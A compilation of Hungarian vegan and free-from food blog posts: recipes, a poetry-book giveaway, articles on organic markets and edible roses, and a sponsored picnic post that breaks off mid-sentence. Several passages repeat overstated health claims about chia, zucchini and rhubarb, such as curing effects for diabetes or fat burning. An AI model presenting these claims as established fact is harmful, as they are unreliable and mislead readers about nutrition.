kapható "barnacukor" a legtöbb esetben nem más, mint fehércukor nádmelasszal színezve. Így az nem egészségesebb, mint a fehércukor (bár az elnevezés alapján sokan ezt feltételezik), szemben az élettanilag valóban sokkal előnyösebb nádcukorral. Tehát ajánljuk figyelmetekbe a céget. Jó vásárlást, kóstolást kívánunk!
Áfonyás smoothie
2015. július 14. Éltető ételek
Sajnos itt Kelet-Magyarországon nem nagyon terem meg az áfonya, mert csak a savanyú kémhatású talajt szereti. Írtam is róla egy blogot, érdemes elolvasni. De azért néha veszek a piacon, mert nagyon finom ételeket, italokat lehet készíteni belőle. Ez a mostani turmix is ilyen lett, a gyerekeimnek is nagyon ízlett. Hozzávalók: - 1 banán - 1 marék áfonya - 1 marék málna - 1/2 kávéskanál fahéj - 3 dl mandulatej Elkészítése: Mindent turmixoljunk össze.
Reggelire fel! - Chia magos, áfonyás, puffasztott amaránt reggeli (gluténmentes, laktózmentes, tojásmentes, főzésmentes, vegán)
Chia magos áfonyás puffasztott amaránt (mindenmentes, vegán) A vegetáriánusokat sokszor éri az a kritika, hogy az étkezésükből hiányoznak bizonyos tápanyagok. Ilyen például a megfelelő mennyiségű omega zsírsavak bevitele. Az Omega 3 zsírsavakat az emberi szervezet nem képes előállítani, ezért ezeket táplálkozás útján kell bevinni. Az Omega 3 esszenciális zsírsavak fontos szerepet játszanak a szív- és érrendszeri funkciók működésben, a mentális egészség és más testi funkciók terén. Kutatások igazolták, hogy az Omega 3 zsírsavaknak pozitív hatása van a koleszterin szintre valamint a szív-és érrendszer normális működésére. Ha húsmentesen is tudatosan táplálkozunk, semmiféle tápanyaghiányban nem fog szenvedni a testünk hosszú távon sem! A vegetáriánusság nem azt jelenti, hogy holnaptól nem eszem húst, és kész. Ez a lusta verzió tényleg problémákhoz vezethet hosszú távon... A mai információval teli világban azonban nem kell sokáig kutakodnunk, hogy mindenre megtaláljuk az egyszerű, számunkra is megfelő megoldást! :-) "Például tudtátok, hogy 15 g chia mag annyi Omega3 zsírsavat tartalmaz, mint 250 g lazac??? Chia mag (superfood, szuper étel) A CHIA MAG (vagy más néven aztékzsálya-mag) nagyon fontos forrása a többszörösen telítetlen zsírsavaknak amilyenek az omega-3, omega-6 és omega-9 zsírsavak: 2 teaskanál chia mag fedezi a napi Omega3 szükségletet! gazdagon található benne természetes rost, fehérje és ásványi anyag, mint például kálcium és magnézium magas fehérjetartalmú és a 8 esszenciális aminósav mellett további aminósavakat is tartalmaz gluténmentes, így bátran fogyaszthatják az ételallergiások is Érdekesség! Míg hő hatására a legtöbb zöldség elveszíti az értékes antioxidánsokat, addig a Chia magban sütés vagy főzés után sem csökken az antioxidáns tartalom. a Cukorbetegség mellékhatásaira is jótékony hatással van . A torontói egyetem kutatásai során fedezték fel, hogy chia magot adva a cukorbetegek étrendjéhez, jelentős javulás volt észlelhető bizonyos gyulladások csökkentése és vérnyomáscsökkenés terén. A 3 hónapos teszt időszak után az eredmények 40%-os javulást mutattak . fogyást segítő tulajdonságai sokaknál bizonyítottak: H a a magokat beáztatjuk, saját súlyuk 12-szeresét tudják magukba szívni a folyadékból, és zselés állagúak lesznek, ami a gyomorban, lassítja a szénhidrátok és cukrok lebomlását. - természetes szuperélelmiszer, ami, mindennapi használatra ajánlott, hogy tápanyagban gazdag ételeket készítsünk a chia maggal: Keverhetjük joghurtba, pudingba, műzlibe, levesbe, rászórhatjuk salátákra, használhatjuk bármilyen körethez, öntetekhez, süteményekhez. A napi étrendbe beépítve a lehetőségek határtalanok." Forrás: Originalchia.hu Az ábra innen származik: www.originalchia.hu Tudom, hogy most sokan azt gondoljátok, de olyan drága a chia mag, hogy nem tudom megfizetni... :-( Szerintem valaminek az ára, az értéke, mindig viszonyítás kérdese! ;-) Nagyon lassan fogy, mert csupán 1-2 teaskanállal fogyasztunk belőle, és nem is minden nap. Ráadásul számoljunk csak utána, hogy mennyibe kerülne ugyanez a mennyiség lazacba vagy egyéb értékes halba átszámolva??? Az sem sokkal olcsóbb... A választás rajtunk áll! Előre fizetjük ki az egészségünk árát, vagy majd utólag a betegségét?! Chia magos, áfonyás, puffasztott amaránt reggeli (mindenmentes, főzésmentes, vegán) És akkor térjünk is rá a receptre! Ez egy nagyon egyszerű reggeli ötlet, kevés hozzávalóból, de valószínűleg nem mindenki számára egyszerű hozzávalókból. A chia mag és a puffasztott amarant ritkán előforduló alapanyagok egy átlagos magyar konyhában. Receptjeimmel szeretnélek bevezetni titeket az egészségesebb hétköznapokba, egy tudatosabb konyha kialakításába, így néha számotokra idegen, új alapanyagokkal is fogtok találkozni. Mint például most is! :-) Merjetek változtatni, új dolgokat kipróbálni, hisz azért nézegettek ilyen reform recepteket, blogokat, mert szeretnétek a régi megszokott étkezést, egészségesebb táplálkozásra cserélni! Ehhez pedig nem csak új receptek, és ételkészítési ötletek kellenek, de néha új alapanyagok is! ;-) (Bővebben, lásd a bejegyzés alján a Megjegyzés rovatban.) Chia magos, áfonyás, puffasztott amaránt reggeli (mindenmentes, főzésmentes, vegán) HOZZÁVALÓK (2 főre): - 1 db érett banán - 2 marék áfonya (vagy más tetszés szerinti gyümölcs) - 2 dl növényi tej (pl.:rizstej) - 1 ek chia mag - natúr puffasztott amaránt tetszés szerinti mennyiségben - hántolt mandula szeletek a tetejére Chia magos, áfonyás, puffasztott amaránt reggeli (mindenmentes, főzésmentes, vegán) ELKÉSZÍTÉS: Hát ez nagyon egyszerű lesz! :-) Az érett banánt, a megmosott áfonya szemekkel (vagy más gyümölccsel), a választott növényi tejjel (pl.:rizstej) és 1 ek chia maggal, tegyük a turmix gépbe, és turmixoljuk krémes állagúra az egészet. Vegyük elő a poharat, vagy tálkát, amiből fogyasztani szeretnénk majd a reggelit, és kezdjük el rétegezni az áfonyás chia magos "puding" réteget, majd a natúr puffasztott amarántot, majd egy újabb "puding" réteg. A tetejére szórhatunk hántolt szeletelt mandulát, és egész áfonya szemeket is. Chia magos, áfonyás, puffasztott amaránt reggeli (mindenmentes, főzésmentes, vegán) chia magos áfonyás puffasztott amaránt Kb. egy fél - egy órát érdemes pihentetni fogyasztás előtt, hogy a chia magoknak legyen idejük megkocsonyásítani a pudingot. Ha erre az 1 órára a hűtőbe tesszük, nem csak a konyha pultra, akkor a nagyon meleg nyári reggeleken nem csak energiával fog feltölteni ez a tápláló reggeli, de még hűsíteni is fog! ;-) (Akár előző éjjel is elkészíthetjük, és a hűtőben pihentethetjük fogyasztásig.) Nagyon gyorsan és egyszerűen elkészíthető, telis tele ásványi anyagokkal, vitaminnal, fehérjével, rostokkal, antioxidánssal, fedezzük vele a napi omega zsírsav bevitelünket, és még rettentően finom is! :-) Próbáljátok ki és nem fogjátok megbánni! ;-) Chia magos, áfonyás, puffasztott amaránt reggeli (mindenmentes, főzésmentes, vegán) Táplálkozz, ne csak étkezz már a reggelinél is! ;-) Megjegyzés1: Puffasztott amarántot és chia magot, sajnos nem árulnak minden szupermarketben, de ha tényleg komolyan gondoljuk az egészséges táplálkozást a hétköznapokban is, akkor érdemes meglátogatni néhány online webáruházat, akik pár napon belül házhoz szállítják a magas minőségű, egészséges hozzávalókat az életedhez! Ha még nincs kedvenc online "szupermarketed", akkor írd be a google kereső mezőjébe, hogy "bio webáruház", vagy "egészséges alapanyagok webáruház" stb. és ismerkedj. Ne ragadj le az elsőnél, keresd meg a számodra legszimpatikusabb webáruházat, és figyeld az árakat is! Egy nagy előnye az online vásárlásnak, amit én imádok, hogy még cipekedned sem kell a boltból a nehéz súlyokat, mert az ajtómig hozzák a kedves kiszállító fiúk! ;-) Megjegyzés2: Természetesen akármilyen más gyümölccsel is elkészíthető, nem muszáj áfonyát használni. Készítheted például málnával, sárgadinnyével, ribizlivel, vagy akár szederrel is. Bármivel, ami épp kéznél van! Megjegyzés3: Ha a puffasztott amaránt helyett csíráztatott amarántot használunk, akkor a nyers étkezést követők hétköznapjaiba is tökéletesen bele illeszthető ez a reggeli. Chia mag (superfood, szuper étel)
Főzésmentes cukkini "spagetti bolognai mártással", a tökéletes kánikula étel (gluténmentes, laktózmentes, tojásmentes, nyers, vegán)
főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) A cukkini és én 28 évig nem voltunk barátságban. Nagyon kevés zöldség került gyermekkorunkban az asztalunkra, és a cukkini egyáltalán nem tartozott még azon kevesek közé sem. Majd az önnállósodás kezdetén, zsenge felnőtt éveimben sem igazán értettem mire jó ez az ízetlen, enyhén szivacsos állagú, semmire nem használható zöldség?! Szerencsére pár éve, miután tényleg nyitott lettem a sokkal több zöldség fogyasztásra, és elkezdtem kutakodni, hogy mi mire is való, és milyen formában lehet fogyasztani, megláttam a cukkini igazi arcát! :-) Valahogy úgy történt, mint az avokádóval. Rájöttem, hogy nem önmagában csodálatosak ezek az ételek, hanem tökéletes kiegészítői más zöldségeknek, gyümölcsöknek. Alapjául szolgálnak salátáknak, főételeknek, turmixoknak, de még édességeknek is! Ők a növény világ kaméleonjai! :-) Azóta elválaszthatatlanok vagyunk, és minden nagy bevásárláskor kerül a kocsiba 1-2 db cukkini. Főleg a nyár nagy slágere, de szinte egész évben képviselteti magát a boltokban, a zöldségtársadalom eme kiemelkedő szereplője. Fogyaszthatjuk főzve, sütve, párolva, rántva, grillezve, de akár nyersen is! Formájának és szilárdságának köszönhetően, számtalan alakban felhasználhatjuk pl.: karikázva, csíkozva, hajóként, spiralizálva, kockázva, reszelve, vékony lapokként, chipsként stb. (A Pinteresten rengeteg cukkinis képet találhattok, ha beírjátok a "zucchini recipes" szavakat a keresőmezőbe.) főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) A Zöld Avocado gasztroblogon készítettem már nektek mosolygós cukkinis tócsnit, grilleztünk már cukkini karikákat az ízletes kéksajtos amaránt golyók mellé, építettünk céklás-kecskesajtos-cukkinis tornyot a vendégeknek, de dobtam már fel a hagyományos krumplipürét és rizst is nyers reszelt cukkinivel. Rengeteg recept van még a tarsolyomban, melyben megismerkedhettek ennek az olcsó zöldségnek, az értékes oldalaival. Azt hiszem ilyenkor szokták azt mondani, hogy nagyszerű ár-érték arányú termékről van szó. :-) Aki eddig idegenkedett tőle, bátran merem ajánlani, hogy tegye meg a kezdő lépéseket a cukkini felé, mert nem fogja megbánni! ;-) Miért is érdemes cukkinit fogyasztani? "A cukkini 95%-a szöveti víz: kiválóan pótolja a szervezet vízszükségletét. Sokféle ásványi anyagot (mangán, kálcium, magnézium, kálium, réz, foszfor, cink) és vitamint (A, B1, 2, 6, 9) tartalmaz. Folsavban és élelmi rostban gazdag. Antioxidáns anyagai révén kimutatható módon csökkenti a káros sejtmutációk előfordulását. Enyhe hashajtó, gyulladásgátló és vértisztító. Béta-karotin és C-vitamin tartalmánál fogva védi az érfalat. Csökkenti az asztma, a csont-ízületi és a reumatikus gyulladások kockázatát. Csökkenti a prosztata problémák esélyét." Forrás: Tudatosvásárló főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) A mai recept, amit hoztam nektek, nem az én találmányom. Az internet telis tele van, jobbnál jobb cukkini spagetti receptekkel. Én először Lénárt Gitta oldalán találkoztam vele, de azóta már rengeteg variációt láttam külföldi és magyar oldalakon is. Valószínűleg sokan közületek már szintén találkoztak a nyers cukkini "spagetti bolognai mártással" recepttel, így nektek ez a bejegyzés nem fog új ötlettel szolgálni, csak emlékeztet titeket arra, hogy ebben a nyári kánikulában milyen jól tud esni, egy folyadékban gazdag, roppanós, friss és energiadús cukkini spagetti?! Nem kell hozzá befűteni a konyhát, hisz, minden nyers benne, nagyon gyorsan és egyszerűen elkészül. Akár kempingezés közben, vagy a tóparti faházban is elkészíthetjük a családnak a nyaralás alatt. Vitaminban, ásványi anyagokban gazdag, könnyen emészthető, mindenmentes, ízletes, zamatos saláta, ami fehérjetartalmának és magas víztartalmának köszönhetően egy fő étkezést is kiválthat a nagy melegben. :-) Hozzávalók: főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) HOZZÁVALÓK (2 főre): - 1 db nagyobb cukkini - 3 db közepes méretű, érett paradicsom - 1/2 kisebb lila hagyma - 2 gerezd fokhagyma - 1 bögre dió (előző éjjel beáztatva) - 1-1 marék fenyőmag, tökmag, napraforgómag - 1 közepes sárgarépa - 4 db friss bazsalikom levél - 1/2 citrom leve - Himalája só, frissen őrölt fekete bors - 3 ek sörélesztőpehely - (csíra, kendermag, avokádó, friss petrezselyem, aszalt sós magos kréker, vagy puffasztott kukorica tallér - opcionális) főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) ELKÉSZÍTÉS: A nyers cukkinit alaposan mossuk meg, vágjuk le a kemény végét, majd csíkozzuk fel, amilyen keskeny csíkokra csak tudjuk. Ez lesz a "spagetti tésztánk". :-) Minél vékonyabb, annál jobb! A profik ezt egy ún. spiralizáló konyhai eszközzel készítik, amivel gyorsan és egyszerűen, gyönyörűszép cukkini spirálokat lehet készíteni. Nekem ilyen segítőtárs nincs a konyhámban (egyenlőre), ezért marad a kézi szeletelés. :-) Sózzuk be, és hagyjuk állni egy fél órát. Ettől megpuhul a cukkini, és könnyebb lesz vele bánni. Közben készítsük el a többi hozzávalót. A diót áztassuk be előző éjszaka, majd öntsük le róla az áztató lét. (Így sokkal könnyebben megemészthető.) Daráljuk le az ázott diót a fokhagymával. Ez lesz a "darált hús". A dió magas fehérjetartalmának köszönhetően tökéletesen helyettesíti a húst az ételben. A paradicsomokat a lila hagymával, a sárgarépával, sóval és borssal turmixoljuk le. Ez lesz a "bolognai szósz" paradicsomos alapja. A friss bazsalikom leveleket zúzzuk szét egy mozsárban, vagy vágjuk apróra egy olló segítségével, és keverjük a paradicsom szószba. hozzávalók a nyers cukkini spagettihez, bolognai mártással Gyakorlatilag kész is az étel. Szedjük ki a tányérra a cukkini spagettit, majd rá a paradicsomszószt, és a darált diót ("darált húst"). Az egészet szórjuk meg tetszés szerinti mennyiségben és összetételben sós magvakkal (pl.: 1 ek fenyőmag, 1 tk napraforgómag, és 1 tk tökmag). Végezetül, hogy az ízélményt és a tápértéket növeljük, szórjunk az étel tetejére "reszelt sajtot", amit a sörélesztő pehely helyettesít ebben a nyers vegán ételben. A sörélesztő pehely sajtszerű íze tökéletesen illeszkedik a spagettinkhez. (Én tettem még hozzá csírát és magas fehérjetartalmú kendermagot is, de ezek elhagyhatóak.) főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán) Tápanyagban, frissességben, és üdeségben gazdag jó étvágyat kívánunk a nyári melegben is! ;-) Ha úgy érzed (főleg a férfiak), hogy ettől nem fogsz jól lakni, akkor ropogtass mellé puffasztott tallérokat (pl.:kukorica tallér), vagy aszalt sós krékereket. De ne tévesszenek meg a nyers alapanyagok! Elméletben csak egy saláta, a gyakorlatban azonban egy nagyon jól összerakott, teljesértékű étel, amitől nem maradunk éhesek! :-) Megjegyés: Ha szeretnétek még több nyers, friss, energiadús, tápanyagban gazdag, lédús saláta receptet amivel a tikkasztó melegben táplálhatjátok a testeteket, akkor nézzetek körül a blogon a "Saláták" menü pont alatt. Sütésmentes desszertekért pedig írjátok be a keresőbe a "nyers" szót. főzésmentes cukkini "spagetti bolognai mártással" (mindenmentes, nyers, vegán)
Zengeteg Rengeteg verseskönyv nyereményjáték
2015. június 24. Zizi kalandjai
Ritát nemrég ismertem meg I.-n keresztül és ajándékozott nekünk egy a szívünkhöz most már nagyon közel álló könyvet. A saját verseskönyvét, ami szól gyerekeknek, felnőtteknek, szülőknek. “Fontos, és egyben aktuális témát dolgoz fel, bármilyen gyerekről is legyen szó. A versek közelebb visznek belső világunkhoz, míg az illusztrációk a gyerekeknek csalogatóak. A közös együttléthez, esti olvasáshoz mindenképpen tökéletes.” – mondja Rita a könyvéről. És, hogy honnan jött az ötlet, hogy írjon egy ilyen könyvet? “Szeretném a gyereket megérteni felnőtt fejjel. Elsősorban anya vagyok, én is nevelek gyereket és találkozom a napi problémákkal. Tudom milyen érzés, amikor a saját dolgaink nyomják a vállunkat, és képtelenek vagyunk másra fókuszálni. De szülőnek lenni a legfontosabb feladat, és mi vállaltuk! Egy zárt autista gyerek számára a világ teljesen mást mutat, viszont a szülő számára is a saját gyereke. Nehéz megtalálni a közös utat. A Zengeteg Rengeteg versek a gyerekeken keresztül érkező érzésekből rendeződtek versekké, és nekünk szülőknek egyfajta mankóként szolgálnak. Célom az lenne, hogy megtanuljunk kicsit a szürke hétköznapokban gyerekszemmel látni, és a ,,híd, mely minket összeköt megépüljön, mélyen beköltözzön a szívünkbe, napi rutinná váljon. Példák vagyunk gyerekeink számára, tehát csináljuk jól. A szeretet, elfogadás, befogadás az egyik legjobb eszköz, hogy megértsük a körülöttünk lévő világot, embereket. Legyenek tehát mankók Mindenki számára a versek, és ha egy-egy könnycsepp jelenik meg, sose szégyeljük. Ezek is mi vagyunk!“ Íme a mi kedvenc versünk a könyvből: Sávolyi Rita – Gyurmagyerek Gyurmagyerek nagyon kerek kicsi orr és pici száj. Szereti ha dögönyözik, keze, lába égnek áll. Nagyon jó ha együtt játszunk sikít, visít, kiabál. Élvezi a morzsolgatást, kedvence a pusziszáj. Gyurmagyerek sose fárad, jön belőle szeretet, Nyakad köré tekeredik, mosolyog, ha kergeted. Öröm vele minden perc, hisz tanítónak született. Megmutatja, hogyan legyél vele együtt újra gyerek. ***** NYEREMÉNYJÁTÉK!!! Nyeremény : Rita felajánlása jóvoltából két szerencsés megnyerhet egy-egy példányt a Zengeteg Rengeteg című könyvéből. Írjátok meg ide a bejegyzés alá kommentben, hogy nektek gyerekként melyik verses, mondókás vagy meséskönyv volt a kedvencetek! Ezenkívül lájkoljátok Rita Facebook oldalát, a Kerektért. Szabályok : 2015. június 23-tól 28-ig lehet játszani. Eredményhirdetés 2015. június 29-én. A nyerteseket emailben fogom értesíteni, majd a nevük kikerül a blogra (ez a bejegyzés fog frissülni). A nyerteseknek a nyereményt Rita postázza magyarországi címre.
Biotermények, termelői piacok, és közösségi vásárlás
A "bio" már sok éve különleges hívószó azoknak, akik egészségesen szeretnének étkezni és élni, az ilyen termékek közismerten vegyszerek használata nélkül növekednek, szépek, és finomak, igaz az áruk is jellemzően magasabb, hiszen az esetek többségében nem nagyüzemi módszerekkel állítják elő őket, hanem kisebb (családi) gazdaságokban. Ha már családi gazdálkodás, akkor a honi helyzetben ez is egy fontos szempont, sokan szeretnék támogatni a magyar gazdákat, a nyilvánvaló okok mellett azért is, hogy ellenőrzött forrásból származó, friss élelmiszerhez jussanak, szemben a tartósított, ezer kilométereket utaztatott import áruval szemben. Ha pedig az áru messziről érkezik, felmerül annak a kérdése is, hogy mekkora kizsákmányolás árán kerül a fejlett világ országainak boltjaiba a holmi, tehát hogy például az afrikai, kínai, dél-amerikai termelő megkapta-e érte a jogos jussát, vagy valamely lelketlen multi zsebeli be a termékből a hasznot. Aki mindhárom felsorolt szempontot fontosnak tartja a vásárlásnál, nehezen tud választani, hiszen a forrás, vagy a termelő sorsának megismerése nehéz feladat, sokszor lehetetlen.
Rebarbara-narancs lekváros diós muffin (gluténmentes, laktózmentes, tojásmentes, vegán)
Rebarbara... egy furcsa és a magyarok számára kissé idegen zöldség, melyből főleg édességek, sütemények, lekvárok készülnek. Az elmúlt pár hétben jó pár magyartól hallottam, hogy "de mi az a rebarba, hogy néz ki, és milyen íze van?". Bevallom őszintén 1 évvel ezelőttig én sem tudtam, annak ellenére, hogy nyugat-európában tele vannak a boltok polcai vele áprilistól-júliusig. Emlékszem, hogy fogalmam sem volt mire fogom felhasználni, de láttam, hogy mindenki beteszi a bevásárló kosarába, ismerős volt a neve, és még érdekesen is nézett ki, ezért hát úgy döntöttem, lesz, ami lesz, vegyük meg, és majd kitalálunk mellé valami receptet. ;-) Az első receptet az Interneten találtam. Még ismeretlen volt számomra ez a misztikus zöldség, ezért nem vagánykodtam, és egy az egyben lemásoltam, amit a neten találtam. Nem mondom, hogy rossz volt, mert elfogyott, de nem váltunk rebarbara kedvelőkké tőle. Az első találkozás nem volt maradandó élmény... Eljött az idei rebarbara szezon is, és újra megpróbálkoztam vele. Ezúttal már bátrabban mertem újítani, és a végeredmény valami fenomenálisan finom lett! :-) A narancsos rebarbara lekvár abbahagyha tatlanul finom, és a diós tészta tökéletesen kiegészíti a rebarbara fanyar mégis édes ízét. A kanál nyalogatás kihagyhatatlan része a sütemény készítésnek ebben az esetben. Avatatlan vendégeknek is megvolt az első nagy találkozás ezzel az ismeretlen zöldséggel, és ők is imádták ezt a süteményt! Szóval kedves Olvasóm, ha még nem kóstoltál rebarbarát, akkor ez egy tökéletes lehetőség rá, hogy megszeresd! :-) "A rebarbara rosttartalma különösen magas, különleges és finom összetevője lehet egy tavaszi méregtelenítő, béltisztítókúrának. A rebarbara levele mérgező, húsos, pirosas szára viszont finom, egészséges és diétás nassolnivaló lehet. Mivel 100 gramm rebarbara csak 16 kalóriát tartalmaz, bűntudat nélkül fogyaszthatod akár reggelire, akár uzsonnára. Ám jellegzetes, fanyar ízét ne cukorral próbáld meg tompítani, inkább egyél hozzá más gyümölcsöket, például banánt vagy epret. A rebarbara gazdag A-, B1-, B2- és C-vitaminban, így segít beindítani a zsírégetést, flavonoidjainak köszönhetően fokozza az anyagcserét, káliumtartalmának köszönhetően pedig kiváló vízhajtó is. A népi gyógyászat székletlazító, bélműködés-szabályzó tulajdonsága miatt is használja. A rebarbaráról fontos tudnod, hogy oxálsavat tartalmaz, ami rossz hatással lehet a szervezeted kalciumháztartására, ám ahhoz, hogy ez a negatív hatás érződjön, napi egy kilogramm rebarbarát is meg kellene enned." Forrás: Femina Bár a rebarbara alacsony kalória tartalmának, és vízhajtó hatásának köszönhetően diétás ételnek számít, ez a recept elég sok édesítőszert tartalmaz, így egyáltalán nem mondanám fogyókúrás süteménynek. Előnyére váljon azonban, hogy sem fehér lisztet, sem fehér cukrot, sem semmilyen nehezen emészthető hozzávalót nem tartalmaz. Sokkal könnyebben emészthető, mint egy hagyományos bolti sütemény, így várhatóan nem parkol sokáig a testünkben. Ez a diós muffin, narancsos rebarbarás lekvárral, egyszerűen és gyorsan elkészíthető, egészséges, glutén-, tojás- és laktózmentes édesség. Látványos és rendhagyó, így ételallergiás vendégeknek is bátran kínálható! ;-) (Kivéve a dió allergiásokat.) HOZZÁVALÓK: (12 db muffinhoz) - 100 g mandula liszt vagy darált mandula - 70 g rizsliszt - 100 g darált dió (ha előre beáztatjuk, könnyebben emészthető) - 60g édesítőszer (lehet Xilit, Eritrit, vagy barna nádcukor) - 2 dl növényi tej (mogyoró tej vagy mandula tej a legjobb) - 1 tk őrölt fahéj - 1/2 tk szódabikarbóna - 6 ek kókusz olaj - - 5 szál rebarbara (kb.350 g) - 40 g édesítőszer (lehet Xilit, Eritrit, vagy barna nádcukor) - 1 nagy érett narancs ELKÉSZÍTÉS: A muffin tészta száraz és folyékony hozzávalóit dolgozzuk külön-külön össze, majd keverjük egybe, és tegyük a választott sütő formánkba. Előmelegített sütőben, 190°C fokon 30 perc alatt elkészül az illatos tészta. A lekvárhoz a rebarbarákat megtisztítjuk a fás végektől, alaposan megmossuk, és éles késsel kb. 1 cm-es darabokra vágjuk. (A piros héj maradhat.) Egy lábasban (fedő nélkül), közepes lángon feltesszük főni a rebarbara darabokat, összekeverve a választott édesítőszerrel, és 1 nagy narancs frissen facsart levével. Addig főzzük kevergetés mellett, míg meg nem sűrűsödik a lekvár. Ha túl híg lett, tegyünk hozzá 1 ek útifűmaghéjat, vagy csöpögtessük le egy szűrőben. Kihűlés után kanalazzuk a diós tészták tetejére. Nagyon finom és nagggyon puha desszertet kapunk, még kihűlés után is! :-) Kínáld meg a vendégeidet is gyomor barát, tápláló, de mégis finom desszertekkel! ;-) Megjegyzés: A képeken is jól látható, hogy nem hagyományos muffin sütőt használtam. Nem kell megijedni, mert ilyen sütőforma nincs otthon neked, kedves Olvasó! A hagyományos muffinok tetejére is rá lehet a lekvárt kanalazni. Az ízén semmit nem változtat a forma, ahogyan elkészíted! :-)
Rózsa a tányéron
Az ehető virágok szinte teljesen hiányoznak a konyhából, annak ellenére, hogy nemcsak a szájnak, de a szemnek is ingerei. Gyönyörű látványt nyújt egy rózsa, egy levendula vagy akár egy pitypang a tányérunkon, vagy a poharunkban. Ezek kerülhetnek szószokba, édességekbe vagy akár az italokba is. Készíthetünk belőlük zseléket, dzsemeket, szörpöket, de szárítva, porított formában süteménybe is belesüthetjük, krémekbe belekeverhetjük. Az élénk színű virágok természetes ételszínezőként is funkcionálhatnak. Fagylaltokba tehetjük, jégkockába fagyaszthatjuk. A lehetőségek végtelenek... Ne felejtsük el, hogy nem minden virág ehető . Mielőtt a tányérunkra tennénk 1-1 virágot, bizonyosodjunk meg arról, hogy nem mérgező-e (pl. nárcisz, gyűszűvirág, gyöngyvirág, trombitavirág, leander, kökörcsin, őszi kikerics... ezek fogyasztása tilos!). Valamint utak mentén nem érdemes virágokat gyűjteni, és virágboltból se vásároljunk étkezési célra virágot, mivel azok többnyire vegyszeresen kezeltek. Szénanáthásoknak, asztmásoknak érdemes kerülni a virágokat. Kinyílt virágokat szedjünk, és felhasználásig tegyük vízbe. Persze, minél frissebben van felhasználva, annál jobb! A virágokat is mértékkel fogyasztjuk, ízesítésként, mint a zöldfűszereket. A rózsák elég nagy változatosságot mutatnak, mind színben, illatban és méretben is. Van parkrózsa, bokorrózsa, törperózsa, tearózsa, futórózsa... Szerintem minden kertben megtalálható 1-1 tő. Nekünk is van a kerítés mellett. Viszont ne feledkezzünk meg a vadon növő csipkerózsáról sem, amely kiváló gyógynövény. A rózsa végigkíséri az emberiség egész történelmét, egyaránt megjelenik a költészetben a festészetben, a zenében. Összekötjük a szerelemmel, érzelmekkel, a szeretettel. A magyar kultúrában, a népviseletben is jelen van. A rózsa szirma ehető, isteni finom illata van. Mindenképp figyeljünk a vegyszermentességre! A rózsa szinte minden kertben megtalálható. De a szépsége mellett haszonnövényként is felhasználják. Hazánkban ez nem jellemző, viszont nagyon híres a bolgár vagy a francia "olajrózsa". Bulgáriában, a Rózsák völgyében, hajnalban kezdik a szirmok szüretét, mert délelőtt már csökken az olajtartalmuk. 30-50 rózsavirágból 1 cseppnyi olaj készül vízgőz-desztillációval. Így nem csoda, hogy a rózsaolaj drága portéka! Ezt az illóolajat nyugodtan használhatjuk ételeinkhez, viszont 1-1 csepp elég belőle, mert nagyon tömény. Például egy rózsaszörp készítése során 1 csepp, intenzív rózsaízt eredményez. De leginkább kozmetikai célokra alkalmazzák ezt az olajat. Szirmok a konyhában (és a fürdőszobában is) Nemcsak a termesztett rózsa, hanem a csipkerózsa szirma is felhasználható a konyhában. A rosa canina a legelterjedtebb rózsafajok egyike, amely vadon megtalálható. Virágai 3-4 cm átmérőjűek, szirmuk fehér vagy halványan pirosló. Ízletes Rózsás frissítő koktél készíthető a nyári forróság idején, de készítettem már Illatos rózsavizet is. A rózsavíz alapja lehet a rózsaszörpnek, rózsalekvárnak, sütemények, piték ízesítésére használhatjuk, de egy gyümölcsös édességet is nagyon jól feldob. Illatos tea rózsasziromból A rózsa szirmai drog céljából is gyűjthetők. 10-20% csersavat, galluszsavat, 0,01% illóolajat, flavonglikozidát, viaszt, cukrot tartalmaz. Hatása erősen összehúzó, ezért kiváló bélhurut, gyomor- és bélvérzés ellen. Külsőleg lehet szájüregi gyulladások esetén öblögetni, gargalizálni, valamint fogínysorvadás esetén is alkalmazható. Tehát a kiszárított rózsaszirmokból tea készíthető. Számos nyugtató tea alkotórésze a rózsa. A gyerekeim kedvence a csokis rózsaszirom. Felolvasztok 70%-os étcsokit, és óvatosan belemártom a rózsaszirmot. Hagyom megszilárdulni, nagyon finom édesség lesz belőle.
Vegán fine dining először Magyarországon
A Babel Budapest étterem az országban egyedülálló módon rukkolt elő a hagyományos menüi mellett vegán degusztációs menüvel. Az ételsor május 5-én debütált, és az azt megelőző sajtóvacsorán lenyűgözte a résztvevőket, akik elismerően nyilatkoztak az ételekről. Ráadásul a menü teljesen ,,mindenmentes, tehát laktóz- és gluténmentes is, és a hagyományos borpárosítás helyett, az ételekkel harmonizáló juice-okat szolgálnak fel. Az árak természetesen meglehetősen borsosak, 19 500 Ft. egy főre a teljes menüsor, + 3500 Ft. a juice párosítás.
Piknik a SkipHop-pal + kedvezménykupon
2015. május 26. Zizi kalandjai
Összeálltunk a Skip*Hop-pal, hogy készítsünk egy tavaszi/közelgő nyári piknikes bejegyzést és bemutassuk nektek néhány új terméküket. Mi nagyon szeretünk piknikezni, de bevallom az előkészületek néha sok időt vesznek igénybe… mire minden ételt elkészítek és becsomagolok, bepakolok, elmúlt szinte a délelőtt, hacsak nem hajnalban kelek. Mindenesetre megéri, mert a természet lágy ölén finomságokat enni a legjobb dolog. Erre a piknikre vittünk magunkkal mentás zöldborsós kölesfasírtokat, sült paradicsomos zöldspárgás tészta salátát, humuszt – hozzá zöldségeket, répát, paprikát csíkokra vágva, tzatzikit, kölesgolyót és puffasztott rizsszeleteket, valamint epret (minden vegán). Ennyi szerintem bőven elég, hogy éhségünket csillapítsuk finomságokkal. A humuszt és hozzá a zöldségeket egy ilyen uzsonnás dobozba csomagoltam. A nagyobb dobozon belül található egy kisebb doboz fedéllel, ebbe tettem a humuszt, de ha salátát pakolunk a dobozba, akkor a kicsibe rakhatjuk külön az öntetet, amit fogyasztáskor öntünk a salátára, hogy addig ne áztassuk el. A doboz természetesen BPA és PVC mentes. A tésztasaláta fogyasztható hidegen vagy melegen is. Én langyosan pakoltam bele egy ilyen ételtároló termoszba. Öt óránál tovább tartja a hideget és hét óránál tovább a meleget. Tartalmazza a multifunkciós evőeszközt (kanál és villa egyben), űrtartalma pedig 325 ml. BPA-, PVC-, ftalát mentes (hogy ez miért fontos, erről itt olvashattok), teljesen biztonságos és 